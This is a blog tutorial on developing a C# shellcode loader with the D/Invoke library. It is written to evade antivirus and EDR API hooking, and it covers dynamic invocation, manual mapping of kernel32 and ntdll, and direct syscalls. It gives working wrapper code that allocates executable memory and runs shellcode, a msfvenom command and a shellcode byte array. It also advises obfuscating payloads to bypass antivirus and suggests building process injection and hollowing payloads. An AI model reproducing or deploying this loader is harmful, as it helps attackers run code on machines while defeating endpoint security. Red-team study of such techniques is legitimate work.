Implementing Dynamic Invocation in C#

By Andrew Peng

This post serves as an introduction to payload development, following up on concepts in basic C# payload development such as the usage of Windows APIs, platform invocation (P/Invoke), and how basic Windows APIs tie together to perform shellcode execution. There are many approaches to payload/stager development, with a choice of languages, frameworks, and so on. This post will focus on C#.

First, credit is due to @TheWover and @FuzzySec for the creation of dynamic invocation (D/Invoke) as well as for providing a blog post that goes in depth on the fundamentals of D/Invoke. The linked blog post provides excellent background on the drawbacks of P/Invoke as a way of using Windows API calls. It states that:

  1. Any reference to a Windows API call made through P/Invoke will result in a corresponding entry in the .NET Assembly’s Import Table. When your .NET Assembly is loaded, its Import Address Table will be updated with the addresses of the functions that you are calling.
  2. If the endpoint security product running on the target machine is monitoring API calls (such as via API Hooking), then any calls made via P/Invoke may be detected by the product.

The blog also includes information on how D/Invoke is integrated with SharpSploit, but doesn’t cover how we can implement it in our own C# payloads. While it also provides a GitHub repo as an example of integrating D/Invoke, the lack of documentation may make it hard to follow.

In this blog post, we’ll walk through an example of our own, while also looking at the multiple different methods available to us.

Rastamouse Fork


To begin, rather than straight up integrating the original D/Invoke project into our payloads, we can use a fork provided by Rastamouse, which contains only the minimum core DynamicInvoke and ManualMap functionality. This fork omits the default D/Invoke Injection folder as well as several Windows APIs.

We will use and make edits to this fork in this post.

Using this fork, rather than the original project, maintains a lower profile and brings us a step toward evading any sort of detection. To go along with this, Rastamouse has provided a wiki to document API usage with D/Invoke.

Setting Up Our Project


Let’s go ahead and start building the framework for our payload. We’ll begin by creating a new project in Visual Studio, making sure to select Console App (.NET Framework) for C#. Because we are building our payload specifically for Windows machines, we don’t need the cross-platform capability that .NET Core brings, and .NET Framework already covers what we’re trying to accomplish. Additionally, .NET Core is not installed by default, whereas .NET Framework is, so we are much less likely to run into compatibility issues. Either way, as long as we are using .NET, our application builds as an assembly, meaning we can tinker with different execution methods and techniques such as reflective loading. A deeper dive into assemblies can be found within the MSDN documentation here: https://docs.microsoft.com/en-us/dotnet/standard/assembly/.

From here, we’ll need to create three folders to house the three D/Invoke namespaces used throughout this post: DInvoke.Data, DInvoke.DynamicInvoke, and DInvoke.ManualMap.

We can name the folders like so:

Now we’ll need to import the C# files into their respective folders. The final result should look something like this:

We can test that the D/Invoke files have been added correctly by attempting to use the GetApiHash method from the Generic class of the DInvoke.DynamicInvoke namespace.

No errors indicates we are all set up and can begin playing around with D/Invoke!

If we do some quick analysis on the D/Invoke library, we find that the DInvoke.DynamicInvoke folder contains the core D/Invoke functionality. We can infer and confirm that the Native class contains Windows Native APIs, such as Nt* functions, while the Win32 class contains Win32 APIs. Interestingly, the only Win32 API included in the RastaMouse fork is CloseHandle (the default D/Invoke library includes CreateRemoteThread, OpenProcess, and IsWow64Process). This raises the question: why aren’t common payload development functions like VirtualAlloc, CreateThread, and VirtualProtect included in the D/Invoke library by default?

Using kernel32 Exported APIs


Just because the D/Invoke library and dinvoke.net don’t include the functions we just mentioned, such as VirtualAlloc, CreateThread, and VirtualProtect, does not mean we can’t use them. In fact, we can create these delegates ourselves, since we know the function prototypes and can port them over from their P/Invoke signatures. You can think of a delegate as a pointer to a function, allowing us to pass methods as arguments to other methods. This is how we can perform dynamic address lookups for relevant Windows APIs and pass the function prototype parameters. This concept, native interoperability, is required because we are working with unmanaged code (Win32 APIs) from a managed language, C# on .NET. An explanation for this can be found here.
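To make the "delegate as a function pointer" idea concrete, here is a minimal sketch that involves no Windows API at all. The names DelegateSketch, AddNumbers, and CallThroughPointer are made up for illustration, and the "unmanaged" function is really an ordinary managed method. It only shows the general shape of the mechanism: a raw pointer is bound to a delegate type and then invoked with an object array of arguments.

```csharp
using System;
using System.Runtime.InteropServices;

public static class DelegateSketch
{
    // The delegate type plays the role of the function prototype: two ints in, one int out.
    [UnmanagedFunctionPointer(CallingConvention.StdCall)]
    public delegate int AddNumbers(int a, int b);

    // Stand-in for an unmanaged function (hypothetical; plain managed code here).
    private static int Add(int a, int b)
    {
        return a + b;
    }

    // Kept in a static field so the delegate is not garbage collected
    // while a raw pointer to it is in use.
    private static readonly AddNumbers Target = Add;

    public static int CallThroughPointer(int a, int b)
    {
        // A raw function pointer, similar in shape to what an address lookup would return.
        IntPtr functionPointer = Marshal.GetFunctionPointerForDelegate(Target);

        // Bind the pointer to the delegate type, then call it with boxed arguments.
        Delegate bound = Marshal.GetDelegateForFunctionPointer(functionPointer, typeof(AddNumbers));
        object[] args = { a, b };
        return (int)bound.DynamicInvoke(args);
    }
}
```

Calling DelegateSketch.CallThroughPointer(2, 3) goes through the pointer rather than calling Add directly. The delegate type is what tells the runtime how to marshal the arguments and the return value.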

To start, we’ll add our Win32 APIs to the DInvoke.DynamicInvoke.Win32 class. To add an API, we’ll need to create a method and a corresponding delegate. The delegate is essentially the function prototype that we are used to seeing, which we can grab straight from P/Invoke. P/Invoke defines the C# signature of VirtualAlloc as:

[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);


It stands to reason that we can create a delegate with the exact same arguments.

[UnmanagedFunctionPointer(CallingConvention.StdCall)]
public delegate IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);


We are using the __stdcall calling convention because it is the convention that Win32 API functions use.

Once we have the delegate set up, we’ll need to create a managed wrapper method that will be called when we want to use the Win32 API.

public static IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect)
{
    object[] funcargs =
    {
        lpAddress, dwSize, flAllocationType, flProtect
    };

    IntPtr retVal = (IntPtr)Generic.DynamicApiInvoke(@"kernel32.dll", @"VirtualAlloc",
        typeof(Delegates.VirtualAlloc), ref funcargs);

    return retVal;
}


The Delegates.VirtualAlloc delegate, which is the delegate we created that houses the function prototype for VirtualAlloc, is passed to DInvoke.DynamicInvoke.Generic.DynamicApiInvoke, which performs a dynamic lookup of VirtualAlloc, grabs the pointer to VirtualAlloc, and passes it to DInvoke.DynamicInvoke.Generic.DynamicFunctionInvoke, where the function wrapped by the delegate is invoked along with the parameters that were passed.

Here is what our Win32 wrapper class looks like:

If we did everything correctly, we should be able to call VirtualAlloc without any errors like so:

IntPtr addr = DInvoke.DynamicInvoke.Win32.VirtualAlloc(IntPtr.Zero, (uint)buf.Length, 0x3000, DInvoke.Data.Win32.WinNT.PAGE_EXECUTE_READWRITE);
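The literal 0x3000 in the call above is the combination of two allocation flags. The sketch below spells that out with named constants. The class name AllocationFlags is made up for illustration, while the numeric values are the ones documented by Microsoft for VirtualAlloc.

```csharp
using System;

public static class AllocationFlags
{
    // Values as documented for VirtualAlloc.
    public const uint MEM_COMMIT = 0x1000;
    public const uint MEM_RESERVE = 0x2000;
    public const uint PAGE_EXECUTE_READWRITE = 0x40;

    // Reserve and commit in one step, which is what the 0x3000 literal expresses.
    public static uint CommitAndReserve()
    {
        return MEM_COMMIT | MEM_RESERVE;
    }
}
```

Using named constants instead of the raw literal makes the intent of the third argument easier to read when revisiting the code later.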


Nice! We can now replicate the above steps for CreateThread and WaitForSingleObject.

[UnmanagedFunctionPointer(CallingConvention.StdCall)]
public delegate IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize,
    IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

[UnmanagedFunctionPointer(CallingConvention.StdCall)]
public delegate UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);


And the wrapper methods:

public static IntPtr CreateThread(
    IntPtr lpThreadAttributes,
    uint dwStackSize,
    IntPtr lpStartAddress,
    IntPtr lpParameter,
    uint dwCreationFlags,
    IntPtr lpThreadId)
{
    // Craft an array for the arguments
    object[] funcargs =
    {
        lpThreadAttributes, dwStackSize, lpStartAddress, lpParameter, dwCreationFlags, lpThreadId
    };

    IntPtr retVal = (IntPtr)Generic.DynamicApiInvoke(@"kernel32.dll", @"CreateThread",
        typeof(Delegates.CreateThread), ref funcargs);

    return retVal;
}
    
public static UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds)
{
    object[] funcargs =
    {
        hHandle, dwMilliseconds
    };

    UInt32 retVal = (UInt32)Generic.DynamicApiInvoke(@"kernel32.dll", @"WaitForSingleObject",
        typeof(Delegates.WaitForSingleObject), ref funcargs);

    return retVal;
}


We can call the functions like so:

IntPtr hThread = DInvoke.DynamicInvoke.Win32.CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
DInvoke.DynamicInvoke.Win32.WaitForSingleObject(hThread, 0xFFFFFFFF);


To test our code, we can use the Metasploit messagebox payload so we won’t have to stand up a C2 framework for testing purposes.

msfvenom -p windows/x64/messagebox TEXT="Tevora Blog App" -f csharp


Alternatively, you can copy this byte array:

byte[] buf = new byte[294] {0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1,0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0xfe,0x00,0x00,0x00,0x3e,0x4c,0x8d,0x85,0x0e,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,0xd5,0x48,0x31,0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x54,0x65,0x76,0x6f,0x72,0x61,0x20,0x42,0x6c,0x6f,0x67,0x20,0x41,0x70,0x70,0x00,0x4d,0x65,0x73,0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x00};


Note that since we’re going through a proof of concept on how to utilize D/Invoke, we’re testing our payload with Defender off and using unobfuscated shellcode. Be sure to add some form of obfuscation to your payload afterwards to bypass AV!

When attempting to build this solution, we may run into architecture errors.

We can change the language version to the latest (10 at the time of this writing) by unloading the project, editing the project file, changing LangVersion to 10.0, and reloading the project.

Unload the Project
Edit Project File
Find the <LangVersion> tag
Change <LangVersion> to 10.0
Reload the Project

Now we can build the solution, and when we execute it, we see a message box pop up!

Now that we have effectively recreated a basic C# payload that uses D/Invoke rather than P/Invoke, let us analyze the differences between the two.

In order to compare P/Invoke and D/Invoke, we need a valid P/Invoke call, so we will use P/Invoke to import the VirtualAlloc API and include a call to VirtualAlloc, storing the resulting memory address in the paddr variable. Our D/Invoke call will still store its result in the addr variable. We’ll also print these addresses to the console so we can search for them.

Now that our payload includes both a P/Invoke and a D/Invoke call, we can execute it within API Monitor, a free tool that identifies all API calls made within the process. When configuring API Monitor, we want to “hook” kernel32.dll to observe the API calls.

We can go to the API Filter box in the top left, search for kernel32.dll, and check all the categories.

In the Monitored Process window, we can click Monitor New Process and attach our EXE, using the Remote Thread Attach method.

We can see our messagebox has popped, the command prompt output gives us the memory addresses that VirtualAlloc returned, and the Summary window in API Monitor has been populated.

We can take the addresses printed to the console and search for them in the Summary window. Let’s start with the P/Invoke address.

Keep in mind we are looking for a VirtualAlloc API call with dwSize set to the size of your buffer (in my case 294) and flProtect set to PAGE_EXECUTE_READWRITE.

We can see clearly here that API Monitor picks up our P/Invoke VirtualAlloc API call.

Let’s perform the same search with the D/Invoke address. After we replace the “Find what” value and keep clicking through “Find next,” we aren’t able to find any VirtualAlloc API call with a size of 294.

This suggests that D/Invoke helps bypass AV and EDR tools that monitor for suspicious API calls in this way. Let’s also take a look at the PE headers.

When executables are built and code is compiled, the result is a Portable Executable (PE), which follows the PE file format. The PE format consists of many different structures and headers, but the overall layout is the same from one executable to the next. The aforementioned IAT is one such part of the PE format, used by the Windows loader to locate DLLs and functions and update the executable with the corresponding addresses. This is apparent in native Windows applications like calc.exe.

However, a .NET executable works a little bit differently. First off, the advantage of using .NET Framework and creating .NET executables is the Common Language Runtime (CLR) and access to the class libraries included in the framework. In addition, while the compiled .NET executable also follows the PE format, the structures are slightly different. When a .NET program is compiled with a C# compiler, the result is a managed module. A managed module (which is a standard PE file) also contains a CLR header, metadata tables, and IL code. When a .NET program is executed, the Windows loader calls the _CorExeMain function from mscoree.dll, which initializes the CLR, checks the CLR header for the managed entry point, and begins execution. The CLR, once loaded, takes care of execution, looking at the metadata tables and compiling IL code into native CPU instructions. Because of this, a .NET executable won’t have an IAT listing the Windows APIs it uses; at most it carries the single mscoree.dll import needed to start the CLR.

Going back to native Windows applications, we can understand that the lack of a CLR means the Windows loader must walk through the entire PE format, which includes the data directories containing the IAT.

The following image from MSDN shows how .NET programs with P/Invoke use Metadata to locate exported functions.

Within the .NET metadata, there are 45 tables containing various amounts of information.

The ImplMap table is particularly interesting:

The ImplMap table contains various information about unmanaged functions statically imported via P/Invoke.

https://pan-unit42.github.io/dotnetfile/api_documentation/tables/implmap/

This is where our P/Invoke import can be seen, and it is likely to be inspected by an EDR once it recognizes that our application is a .NET executable.

Now that we understand the differences between native and .NET executables with regard to the PE format, let’s see those differences in practice. We will use CFF Explorer, a PE editor, to compare the PE structure of our .NET executable with that of a native Windows executable.

First, looking at the native calc.exe application, we can see the Import Directory folder, with the kernel32.dll imported and the relevant Windows APIs below.

Now let’s take a look at our .NET application. We see the lack of an Import Directory folder, but the inclusion of a .NET directory folder containing the various metadata tables. In the ImplMap table, we see the one P/Invoke API that we included in our code. But more importantly, we do not see the D/Invoke APIs here.

While these changes will help evade several AV/EDR solutions, they might not bypass all types of API hooking, since API hooks placed on kernel32.dll may still detect suspicious use of API calls. To improve our payload, we can look into manual mapping.

Manual Mapping


Manual mapping can help us avoid API hooking. We can begin by mapping a fresh copy of kernel32.dll, so that if there are any hooks placed on the originally loaded kernel32.dll, we call VirtualAlloc, CreateThread, and WaitForSingleObject from within our manually mapped kernel32.dll instead.

To do this, we’ll create a PE_MANUAL_MAP object containing the kernel32.dll from disk.

DInvoke.Data.PE.PE_MANUAL_MAP kernel32 = DInvoke.ManualMap.Map.MapModuleToMemory("C:\\Windows\\System32\\kernel32.dll");


D/Invoke offers us a couple of options for manual mapping:

  1. DLLMain
  2. Export
  3. Byte Array (Uses Export)

Let’s try using Export (2).

We can see that the D/Invoke function here is slightly different: instead of calling DynamicApiInvoke (which locates the function pointer to the API through GetLibraryAddress), CallMappedDLLModuleExport uses GetExportAddress (which works from the base address of the manually mapped kernel32.dll).

In the Native class of the main DInvoke.DynamicInvoke namespace, we see comments about how the Delegates structure must be public so that its delegates may be used with DynamicFunctionInvoke. Since that is exactly what we will be using, we must change the Delegates structure in our Win32 class to be public.

Before we call the CallMappedDLLModuleExport function, we’ll need to create an object array for the parameters we want to pass to DynamicFunctionInvoke. We can take advantage of the built-in structures that are included in the D/Invoke library.

object[] VAparameters =
{
    IntPtr.Zero,
    (uint) buf.Length,
    DInvoke.Data.Win32.Kernel32.MEM_COMMIT,
    DInvoke.Data.Win32.WinNT.PAGE_EXECUTE_READWRITE
};


CallMappedDLLModuleExport returns an object, so we’ll need to cast it to an IntPtr (the VirtualAlloc expected return type).

IntPtr addr = (IntPtr)DInvoke.DynamicInvoke.Generic.CallMappedDLLModuleExport(kernel32.PEINFO, kernel32.ModuleBase, "VirtualAlloc", typeof(DInvoke.DynamicInvoke.Win32.Delegates.VirtualAlloc), VAparameters);


From here, we can comment out our original VirtualAlloc call, build and run our payload, and pop a messagebox.

We should be able to follow the same process for CreateThread and WaitForSingleObject. Make sure you call Marshal.Copy before executing CreateThread, otherwise you’re not going to be executing anything!

Nt* Functions


Let’s take a step back and replace our D/Invoke VirtualAlloc call with P/Invoke and see what happens in API Monitor. I can simply comment out my D/Invoke call, import P/Invoke’s VirtualAlloc, and replace the addr variable with a VirtualAlloc call.

Once it’s replaced, we can compile it. In API Monitor, we were previously only monitoring kernel32.dll. Let’s also monitor ntdll.dll this time by searching for it in the API filter and checking all the categories under ntdll.dll.

Now when we execute our test payload in API Monitor, we can once again search for the VirtualAlloc call with the size of our payload and PAGE_EXECUTE_READWRITE permissions.

Now that we’re monitoring both kernel32.dll and ntdll.dll exported APIs, we see something interesting here.

This VirtualAlloc call is the one from our payload, has a dwSize of 294, and has PAGE_EXECUTE_READWRITE permissions. We also see an underlying ntdll.dll call, NtAllocateVirtualMemory.

We can look into the parameters of NtAllocateVirtualMemory to confirm this is a result of our VirtualAlloc code.

A little sidebar here to explain why it works this way. There are four privilege levels, known as rings, that control access to memory and CPU operations. Ring 0 (kernel mode) is the most privileged and Ring 3 (user mode) is the least privileged. The majority of user activity occurs in Ring 3, but applications cross into Ring 0 when calling a variety of APIs (think accessing the file system). User applications generally call high-level APIs (kernel32, user32), and those APIs in turn call low-level APIs (ntdll). Ntdll.dll is considered a “bridge” between user land and kernel land because the Nt* functions exported from ntdll.dll are essentially wrappers for system calls (syscalls). Syscalls are how a program requests a service from the kernel, and they are ultimately what our code is executing. The following diagram outlines user land and kernel land:

And an Nt* function merely acting as a wrapper for a syscall is shown in this unassembled NtAllocateVirtualMemory call:

In this example, the syscall number (18h) is moved into the EAX register (the same register that holds function return values). The syscall instruction is then executed, requesting the kernel to allocate memory.

Since NtAllocateVirtualMemory is an ntdll.dll function, it stands to reason that manually mapping kernel32.dll may bypass an EDR that relies on kernel32.dll API hooks. But if an EDR hooks ntdll.dll (which is extremely common and considered the norm nowadays), then even if our VirtualAlloc call goes undetected, we will still get caught by the underlying NtAllocateVirtualMemory call. Since we’re not making this call ourselves in the payload, even if we were to manually map ntdll.dll into our payload, there’s no way for us to control this API call.

We can see this play out even if we were to replace this P/Invoke call with our manually mapped VirtualAlloc call. For this, we can use Frida. Frida is a dynamic instrumentation toolkit, installable as a Python package, that allows us to hook functions in a running process (including a .NET one) and to customize in JavaScript how we want to interpret function arguments and return values. To install it on our Windows development box, just ensure Python is installed.

pip install frida-tools


You may need to add Python to your PATH, after which you can invoke Frida like so:

frida-trace


To let Frida hook into our application, we’ll add a couple of lines of code that output the process ID (which must be passed to Frida) and pause the application until it receives user input.

We’ll add this to the beginning of the Main() method.

From here, we can compile the application and run it, taking note of the process ID. In another command prompt, we can pass the process ID to Frida, and tell it to hook ntdll.dll and monitor any NtAllocateVirtualMemory API calls.

We can see a JavaScript handler file created for NtAllocateVirtualMemory, which by default, does not give us all the information we need. At this point, we can browse to that JS file and edit it like so:

When the application is about to call NtAllocateVirtualMemory, Frida calls the onEnter function, which will store the value for the arguments of NtAllocateVirtualMemory. When returning from the call, the onLeave function is executed, which will log the respective values stored during the API call.

Note that the function prototype of NtAllocateVirtualMemory is slightly different from that of VirtualAlloc: the RegionSize parameter is a pointer to a variable that stores the size, rather than the size itself. For this reason, we add the RegionValue variable, which reads the value that RegionSize points to. Since there are numerous NtAllocateVirtualMemory calls, this will aid in identifying whether our malicious call is detected. To further help identification, we’ve added a comparison between RegionValue and a hard-coded hexadecimal representation of the length of our byte array, which will output three DETECTED’s if matched.
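If you generated your own shellcode, the buffer length (and therefore the hard-coded value to compare against) will differ. A small helper like the following can produce the hexadecimal form. The names HexLengthSketch and HexLength are made up for illustration.

```csharp
using System;

public static class HexLengthSketch
{
    // Format a buffer length as lowercase hexadecimal with a 0x prefix.
    public static string HexLength(int length)
    {
        return "0x" + length.ToString("x");
    }
}
```

For the 294-byte buffer used in this post, HexLengthSketch.HexLength(294) returns "0x126".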

Frida hooks are updated as soon as the handler files are saved, so we can press any key in our payload to continue. Since there’s a lot of output, it’d probably be easier to copy the output and paste it all in a text editor.

Now that we know that Nt* functions will be called, and that many EDRs hook ntdll.dll rather than kernel32.dll, we can turn to RastaMouse’s dinvoke.net to assist us. Dinvoke.net provides examples of how to use APIs with generic D/Invoke and syscalls (which we will use later), but not with manual mapping. Still, these examples can help us build out our payload.

We’ll first reuse the MapModuleToMemory method to map a fresh copy of ntdll.dll. We’ll declare a uint variable status and set it to 1. This status variable equates to the NTSTATUS result of an API call, with a value of 0 equal to success.
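As a rough sketch of how the status value can be interpreted once a call returns, the helper below mirrors the NT_SUCCESS macro from the Windows headers, which treats any value that is non-negative as a signed 32-bit integer as success. The class and method names are made up for illustration. Note that a placeholder initial value of 1 would itself pass the NT_SUCCESS-style test, so the stricter comparison against zero matches what this post checks for.

```csharp
using System;

public static class NtStatusSketch
{
    public const uint STATUS_SUCCESS = 0x00000000;

    // Mirrors NT_SUCCESS: success and informational codes are non-negative
    // when the 32-bit status is viewed as a signed integer.
    public static bool IsSuccess(uint status)
    {
        return unchecked((int)status) >= 0;
    }

    // Stricter check used in this post: only an exact zero counts.
    public static bool IsExactSuccess(uint status)
    {
        return status == STATUS_SUCCESS;
    }
}
```

For example, 0xC0000005 (STATUS_ACCESS_VIOLATION) fails both checks, while 0 passes both.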

Next, we declare an addr variable, which will be a pointer to our allocated memory.

From here, we’ll create the parameters for and call NtAllocateVirtualMemory, which is very similar to VirtualAlloc with the addition of specifying a process handle.

The documentation states that the NtCurrentProcess macro should be used, which can’t be accessed in C#. NtCurrentProcess and ZwCurrentProcess, which are essentially the same, return a handle to the current process.

If we take a look at the GetCurrentProcess function documentation, it “retrieves a pseudo handle for the current process… A pseudo handle is a special constant, currently (HANDLE)-1, that is interpreted as the current process handle.” It stands to reason that we can pass this value as an IntPtr as a parameter for NtAllocateVirtualMemory. In fact, we can see that D/Invoke already uses this concept.
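In C#, the pseudo handle described above can be written as a plain IntPtr constant. This is only a sketch: the class and field names are made up for illustration, and the value -1 comes from the GetCurrentProcess documentation quoted above.

```csharp
using System;

public static class PseudoHandleSketch
{
    // (HANDLE)-1, interpreted by Windows as "the current process".
    public static readonly IntPtr CurrentProcess = new IntPtr(-1);

    // True when a handle value is the current-process pseudo handle.
    public static bool IsCurrentProcess(IntPtr handle)
    {
        return handle == CurrentProcess;
    }
}
```

Because it is a constant rather than a real handle, it does not need to be opened or closed.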

Another difference between VirtualAlloc and NtAllocateVirtualMemory is the output and return type. Kernel32.dll exported APIs will usually have their own return type. However, most Nt* APIs have the NTSTATUS return type. With VirtualAlloc, the pointer to the newly allocated memory is the API’s return value, stored as addr. But for NtAllocateVirtualMemory, the return type is NTSTATUS, and the newly allocated memory address is written to the baseAddress parameter. So in order to grab the memory address, we set the addr variable to the baseAddress parameter by reading the second element (index 1) of the parameter object array after the call.
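The reason the address can be read back out of the object array is that Delegate.DynamicInvoke copies the final values of ref parameters back into the array it was given. The sketch below demonstrates just that mechanic with a made-up delegate and a fake, purely managed "allocate" method. AllocateLike, FakeAllocate, and the 0x1000 placeholder are all hypothetical, and no memory is actually allocated.

```csharp
using System;

public static class RefArgumentSketch
{
    // Hypothetical prototype shaped like an Nt* call:
    // the status is returned, the result comes back through a ref parameter.
    public delegate uint AllocateLike(IntPtr processHandle, ref IntPtr baseAddress, uint size);

    // Fake implementation: writes a placeholder value, allocates nothing.
    private static uint FakeAllocate(IntPtr processHandle, ref IntPtr baseAddress, uint size)
    {
        baseAddress = new IntPtr(0x1000);
        return 0; // zero stands for success
    }

    public static IntPtr Run()
    {
        AllocateLike call = FakeAllocate;

        // Index 1 holds the ref parameter; it starts out as IntPtr.Zero.
        object[] parameters = { new IntPtr(-1), IntPtr.Zero, 294u };

        uint status = (uint)call.DynamicInvoke(parameters);
        if (status != 0)
        {
            throw new InvalidOperationException("call reported failure");
        }

        // After the call, the array slot holds the value written by the callee.
        return (IntPtr)parameters[1];
    }
}
```

RefArgumentSketch.Run() returns the placeholder address written by the fake callee, which is the same pattern used to recover baseAddress from the parameter array.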

We can then use the same Marshal.Copy method to copy our buffer to the newly created memory address. We can use Marshal.Copy here since we are within a single process. On the flip side, if we were attempting to build an injection payload such as DLL injection, process injection, or process hollowing, we would need to use NtWriteVirtualMemory instead.

We then follow a similar process for using NtCreateThreadEx. To do so, we’ll just pass the current process handle value as the fourth parameter of NtCreateThreadEx. Just like our NtAllocateVirtualMemory call, we’ll need to grab the handle to the thread we created (tHandle).

To keep our shellcode alive, we will use NtWaitForSingleObject, which isn’t included in D/Invoke since the default library is focused on process injection techniques, where existing processes won’t terminate after the shellcode is run. Similar to what we’ve done with Win32 APIs, we can add an NtWaitForSingleObject delegate in the Delegates structure of the Native class in the DInvoke.DynamicInvoke namespace. Luckily, the function prototype exists on MSDN, so we can easily create our delegate like so.

For the parameters, we can simply supply a handle to the thread (tHandle), and supply IntPtr.Zero as the timeout, as a null value will result in an infinite timeout. Our newly written Nt* function code is shown below:

Syscalls


Lastly, we’ll talk about syscalls. As mentioned previously, Nt* functions are essentially wrappers for syscalls. Since D/Invoke supports syscalls, we can execute the syscall stub directly without having to go through any Windows API calls, which will bypass any hooks placed on userland APIs. Dinvoke.net provides a general idea of how to invoke syscalls. The only change we’ll make here is using the explicit uint type for status. We can simply copy the parameters we used for the Nt* manual map APIs. The very short syscall code is shown here:

Putting It All Together


From the looks of it, syscalls appear to be the preferred method of invoking Windows APIs, and while that may generally be true, D/Invoke syscalls have certain limitations, such as not working in WOW64 processes. Of course, having multiple methods at your disposal means you’ll have more flexibility when it comes to dealing with different types of EDR solutions.

I learned a lot about Windows internals as I was writing this, and hopefully you all have learned a lot as well. The examples shown here aren’t the end, though: you’ll still need to add obfuscation and encryption of shellcode to bypass static analysis. Consider creating DLL injection, process injection, process hollowing, and similar payloads, adjusting the necessary parameters and using the appropriate APIs (such as using NtWriteVirtualMemory instead of Marshal.Copy). There are also functions within the D/Invoke library that we have not used in our examples that can further obfuscate our code. For example, using GetApiHash within the Generic class can help against static analysis, since a dumpbin of our application would otherwise reveal the static strings of the APIs we used. Another benefit of knowing how to manually set up D/Invoke in your projects is the ease of incorporating these techniques into LOLBINS/LOLBAS applications, which can be helpful in bypassing machine-learning-based detection.

References


https://github.com/TheWover/DInvoke

https://thewover.github.io/Dynamic-Invoke/

https://github.com/med0x2e/NoAmci

https://github.com/rasta-mouse/DInvoke/

https://dinvoke.net/

https://docs.microsoft.com/en-us/dotnet/framework/interop/consuming-unmanaged-dll-functions

https://www.red-gate.com/simple-talk/blogs/anatomy-of-a-net-assembly-the-clr-loader-stub/

https://docs.microsoft.com/en-us/windows/win32/debug/pe-format

https://pan-unit42.github.io/dotnetfile/api_documentation/tables/implmap/

Manfred Chang
